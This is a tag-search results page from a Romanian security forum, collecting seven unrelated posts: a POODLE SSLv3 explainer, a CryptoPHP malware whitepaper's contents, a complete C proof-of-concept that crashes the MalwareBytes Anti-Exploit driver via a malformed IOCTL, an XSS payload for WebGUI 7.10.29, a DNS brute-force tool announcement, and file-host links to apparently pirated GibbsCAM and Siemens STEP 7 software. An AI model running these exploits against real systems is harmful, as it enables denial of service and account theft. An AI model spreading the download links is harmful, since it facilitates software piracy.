Jump to content

Search the Community

Showing results for tags 'version'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Google, among several security organizations, recently announced a vulnerability in the SSL protocol, particularly SSL version 3. SSL is used to secure connections between a client and server to prevent eavesdropping, and that the data has not been tampered. SSLv3 is an old version of the SSL protocol, dating back to 1996 and debuted with Netscape Navigator. While a very old version of SSL, it is still widely supported by browsers and servers today. According to SSL Pulse, 98% of web servers support SSLv3 in October 2014. Fortunately more secure replacements for SSLv3 have existed for a long time, such as TLS 1.0. Since TLS has been widely adopted for several years now, nearly all browsers will opt to use TLS instead of SSLv3. The POODLE vulnerability is a flaw in the design of the algorithm, not a bug in a particular software implementation like Heartbleed. POODLE is similar to the BEAST attack, which targets SSLv3 and ciphers that use cipher block chaining (CBC). POODLE (Padding Oracle On Downgraded Legacy) targets users by being active on the network, similar to a man-in-the-middle attack. With the attacker having access to the network, he can force the SSL connection to the lower-grade protocol SSLv3 by interrupting the SSL handshake. Once the attacker has forced the connection to use SSLv3, he can attack the client and force characteristics of the connection that make it predictable. One way an attacker might accomplish this is with a Cross Site Scripting, or XSS. If the attacker is successful, he will be able to steal sensitive information such as authentication cookies. The simplest and most effective way to address this is to completely disable support for SSLv3. This is recommended for server administrators to ensure no clients connect to their resources using old versions of SSL. In another blog post we detailed how to lock down and remove older versions of SSL from the server. For desktop administrators, disable support for SSLv3 at the browser level. This can be accomplished with Group Policy for Internet Explorer. Since TLS is widely deployed, turning off SSLv3 support will have a small impact on most people. Internet Explorer 6 remains the only browser that does not support anything better than SSLv3. As support for SSLv3 is removed over the coming weeks, IE 6 users will have more difficulty using secure websites. IE 6 does support TLS 1.0, however is off by default. Enabling TLS 1.0 in IE 6 can be used as a short term work around until a newer version of IE is installed. Source
  2. CONTENTS Introduction 4 Executive summary 4 1 The initial incident 5 2 Analysis 6 2.1 Plug-in ................................................................................................................................................ 6 2.2 Origin.................................................................................................................................................. 9 2.3 Features............................................................................................................................................ 11 2.4 Setup ................................................................................................................................................ 11 2.5 CMS integration................................................................................................................................ 13 2.6 Crypto and Communication ............................................................................................................. 15 2.7 Manual Control ................................................................................................................................ 17 2.8 Configuration.................................................................................................................................... 18 2.9 Backup communication.................................................................................................................... 19 2.10 Purpose: Blackhat SEO ..................................................................................................................... 20 2.11 Possible author................................................................................................................................. 22 3 Infrastructure 23 3.1 Spreading.......................................................................................................................................... 23 3.2 Command and control servers......................................................................................................... 24 4 Checking for CryptoPHP in plug-ins and themes 26 4.1.1 WordPress......................................................................................................................... 26 4.1.2 Joomla ............................................................................................................................... 27 4.1.3 Drupal................................................................................................................................ 27 5 Appendix: Indicators of Compromise 28 5.1 Network detection ........................................................................................................................... 28 5.2 File hashes........................................................................................................................................ 29 5.3 Command and Control servers......................................................................................................... 30 5.3.1 Version 0.1......................................................................................................................... 30 5.3.2 Version 0.1 (other variant) ................................................................................................ 30 5.3.3 Version 0.2, 0.2x1, 0.2x2, 0.2b3, 0x2x4, 0.2x9, 0.3, 0.3x1................................................. 35 5.3.4 Version 1.0, 1.0a................................................................................................................ 39 5.4 Backup communication email addresses......................................................................................... 42 5.4.1 Version 0.1......................................................................................................................... 42 5.4.2 Version 0.1 (other variant) ................................................................................................ 42 5.4.3 Version 0.2, 0.2x1, 0.2x2, 0.2b3, 0.2x4, 0.2x9, 0.3 ............................................................ 42 5.4.4 Version 1.0, 1.0a................................................................................................................ 50 Read more: http://dl.packetstormsecurity.net/papers/evaluation/cryptophp-whitepaper-foxsrt-v4.pdf
  3. /* Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS Date - 19th January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - https://www.malwarebytes.org Tested Version - 1.03.1.1220, 1.04.1.1012 Driver Version - no version set - mbae.sys Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB - http://www.osvdb.org/show/osvdb/114249 CVE ID - CVE-2014-100039 Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/ Fixed version - 1.05 Fixed driver ver - no version set */ #include <stdio.h> #include <windows.h> #define BUFSIZE 25 int main(int argc, char *argv[]) { HANDLE hDevice; char devhandle[MAX_PATH]; DWORD dwRetBytes = 0; BYTE sizebytes[4] = "\xff\xff\xff\x00"; BYTE *inbuffer; printf("-------------------------------------------------------------------------------\n"); printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n"); printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver"); inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); memset(inbuffer, 0x41, BUFSIZE); memcpy(inbuffer, sizebytes, sizeof(sizebytes)); printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if(hDevice == INVALID_HANDLE_VALUE) { printf("\n[-] Open %s device failed\n\n", devhandle); return -1; } else { printf("\n[+] Open %s device successful", devhandle); } printf("\n[~] Press any key to DoS . . ."); getch(); DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL); printf("\n[+] DoS buffer sent\n\n"); CloseHandle(hDevice); return 0; } Source
  4. Exploit Title: WebGUI 7.10.29 stable version Cross site scripting vulnerability Software Link: http://www.webgui.org/download Author: SECUPENT Website:www.secupent.com Email: research{at}secupent{dot}com Date: 17-1-2015 Version: 7.10.29. Previous version maybe vulnerable also. Vulnerable area: http://localhost/style-underground/search XSS PoC: 1" onmouseover=prompt(907460) bad=" Screenshot: Link: http://secupent.com/exploit/images/webgui-xss.png Mirror: http://vulnerability.io/exploit/images/webgui-xss.png Reference: http://secupent.com/exploit/WebGUI-7.10.29-XSS.txt Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers. Source
  5. Description Resolver is a windows based tool which designed to preform a reverse DNS Lookup for a given IP address or for a range of IP’s in order to find its PTR. Updated to Version 1.0.3 added dns records brute force. Download: Resolver | SourceForge.net
  6. Gibbscam 2013 Version v10.5.25.0 Multilanguage (x86/x64) Gibbscam 2013 Version v10.5.25.0 Multilanguage (x86/x64) Gibbscam 2013 Version v10.5.25.0 Multilanguage (x86/x64) | 1.2 Gb Languages: Chinese Simplified, Chinese Traditional, Czech, Dutch, Finnish, French, German, Italian, Japanese, Korean, Polish, Portuguese, Russian, Spanish, Swedish. Turkish. Gibbs and Associates, a developer of CAM software for thirty years, announces its latest release, GibbsCAM 2013 version 10.5.25.0, with numerous productivity enhancements. GibbsCAM 2013 includes two powerful new options for CNC machining: - The 5-axis multi-blade option supports simplified and versatile programming of turbo-machinery parts such as impellers, blisks, and turbines. - The 5-axis porting option provides users with a broad selection of capabilities for programming components with variable internal containment features, such as ports and manifolds. GibbsCAM 2013 includes enhancements to the entire suite of GibbsCAM software to improve efficiency and profitability. Highlights include improved support for feature-based CNC machining by offering users the versatility to identify, group and machine features while maintaining total process control, and a more powerful "profiler" tool capable of extracting CNC machining boundaries and drives from a model without the need to create, modify or chain curves. Enhancements to geometry creation, turning, contouring, pocketing, and improved Swiss machining support are just a few additional highlights in this robust release. GibbsCAM 2013 version 10.5.25.0 Update List: Fix: Resolved an issue that caused the "Program Stop" function to be removed upon regeneration of a Lathe operation. Fix: Resolved an issue that caused Machine Simulation to crash during rendering. About Gibbs and Associates Since our founding in 1982, we have been a leader in providing cutting-edge CAD/CAM technology while maintaining its signature ease-of-use and productivity increasing qualities. William F. Gibbs started the company in an effort to bring NC programming services to the greater Los Angeles area at a time when many households had not even seen a desktop computer. Just two years later, we introduced our Gibbs System (inspired by the Macintosh graphical interface) leading the way in the development of CAD/CAM software. Name: GibbsCAM Version: 2013 Build 10.5.25.0 Interface: multilanguage OS: Windows XP / Vista / Seven Size: 1.2 Gb DOWNLOAD LINKS: http://u19822771.letitbit.net/download/65107.68994d5d6e266ad37422f1342f4c/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__1_.rar.html http://u19822771.letitbit.net/download/15176.12224d9aacf3dec9bcec8489f424/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__2_.rar.html http://u19822771.letitbit.net/download/64212.6d1e4f65224f027c48c7f4c9e433/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__3_.rar.html http://uploaded.net/file/4h194dkc/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__1_.rar http://uploaded.net/file/51nnuy1e/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__2_.rar http://uploaded.net/file/nj9ft90r/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__3_.rar http://rapidgator.net/file/fb04bf4a251014d4f9d691578eb07bee/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__1_.rar.html http://rapidgator.net/file/2586c195407fc94c79f6888c10fe2a92/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__2_.rar.html http://rapidgator.net/file/ece3bb1fa7e15174d7c9aa91d36dd209/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__3_.rar.html http://www.uploadable.ch/file/aEKek6cHyWBP/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__1_.rar http://www.uploadable.ch/file/dv8JZs36U9zT/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__2_.rar http://www.uploadable.ch/file/9zhVuxQNnPuq/05.GibbsCAM.2013.version.10.5.25.0.Multilanguage__3_.rar
  7. SIEMENS SIMATIC STEP 7 version 5.5 SP4 Update Multilingual SIEMENS SIMATIC STEP 7 version 5.5 SP4 Update Multilingual | 1.6 GB STEP 7 Professional - the ultimate engineering tool for configuration and programming for all SIMATIC controllers. SIMATIC WinCC Basic is also included here for simple visualization tasks with SIMATIC Basic Panels. With its vast array of easy-to-use functions, the STEP 7 software significantly boosts efficiency in all of your automation tasks. Whether for configuring hardware, establishing communications, programming, testing, commissioning and service, documentation and archiving, or operational and/or diagnostic functions, the software sets the benchmark in its field. About Siemens AG Siemens AG is a German engineering conglomerate, the largest of its kind in Europe. Siemens has international headquarters located in Berlin, Munich and Erlangen. The company has three main business sectors: Industry, Energy, and Healthcare; with a total of 15 divisions. Worldwide, Siemens and its subsidiaries employ approximately 420,800 people in nearly 190 countries and reported global revenue of 76.651 billion euros for the year of 2009. Siemens AG is listed on the Frankfurt Stock Exchange, and has been listed on the New York Stock Exchange since March 12, 2001. DOWNLOAD LINKS: http://u19822771.letitbit.net/download/26244.2bac41dac8183ae282c43fb95c25/siss7v554.part1.rar.html http://u19822771.letitbit.net/download/10802.1426b279155018a42e7cedad25a1/siss7v554.part2.rar.html http://u19822771.letitbit.net/download/49974.4343aff19fb4e66e159fa24f362b/siss7v554.part3.rar.html http://u19822771.letitbit.net/download/38226.35d20d8f97691f28446bffe65160/siss7v554.part4.rar.html http://u19822771.letitbit.net/download/81720.8b32df34ba0f01f13ad62d247252/siss7v554.part5.rar.html http://uploaded.net/file/lx0mwby5/siss7v554.part1.rar http://uploaded.net/file/uxtictbr/siss7v554.part2.rar http://uploaded.net/file/ets1wyxl/siss7v554.part3.rar http://uploaded.net/file/bl6ixuyz/siss7v554.part4.rar http://uploaded.net/file/ngbjumtx/siss7v554.part5.rar http://rapidgator.net/file/2b97d109f9f50cc908f102a255674aff/siss7v554.part1.rar.html http://rapidgator.net/file/56c8212a79476ba4db388548f351789d/siss7v554.part2.rar.html http://rapidgator.net/file/8418b93f8aa3fcba4101e2c98f74619b/siss7v554.part3.rar.html http://rapidgator.net/file/147758a5ebd7df4e9e422c487384938c/siss7v554.part4.rar.html http://rapidgator.net/file/6049ede2c12e615bff73098b1417bb18/siss7v554.part5.rar.html http://www.uploadable.ch/file/T5TRZFGVx2fW/siss7v554.part1.rar http://www.uploadable.ch/file/HuBnk2CkpyzP/siss7v554.part2.rar http://www.uploadable.ch/file/dh7eeQr6gbsZ/siss7v554.part3.rar http://www.uploadable.ch/file/xXwUvU5hUAWJ/siss7v554.part4.rar http://www.uploadable.ch/file/ua6ubvGUgy6c/siss7v554.part5.rar
×
×
  • Create New...